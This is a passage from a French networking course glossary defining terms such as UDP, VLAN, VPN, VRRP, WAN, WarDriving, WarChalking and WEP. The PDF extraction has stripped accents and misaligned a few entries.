sauts maximal quun paquet est autoris faire avant dtre dtruit.
UDP :
User Datagram Protocol. Protocole rseau de niveau 4, en mode nonconnect.
VLAN :
Virtual LAN. Rseau virtuel dfinit sur un commutateur.
VPN :
Virtual Private Network. Rseau priv virtuel, gnralement constitu par
des tunnels chiffrs.
VRRP :
Virtual Router Redondancy Protocol. Protocole permettant dassurer
lquilibrage de charge et la tolrance aux pannes dans un rseau.
WAN :
Wide Area Network. Rseau tendu.
WarChalking : Pratique complmentaire du WarDriving, qui consiste signaler la
prsence de points daccs de rseaux sans fil dans un btiment laide

130

CNAM Jean-Christophe GALLARD

WarDriving :
WEP :
WPA :
WWW :

de symboles tracs la craie sur les murs. Par exemple )( signale un


rseau ouvert, O un rseau ferm.
Pratique consistant rechercher les points daccs de rseaux sans fil
dans une ville, en utilisant une antenne dcoute relie un ordinateur
portable dans une voiture.
Wired Equivalent Privacy : protocole de chiffrement visant protger
laccs et la confidentialit dun rseau sans fil.
World Wide Web. Systme dinformation distribu et multimdia bas sur
le protocole HTTP.

131

Оценить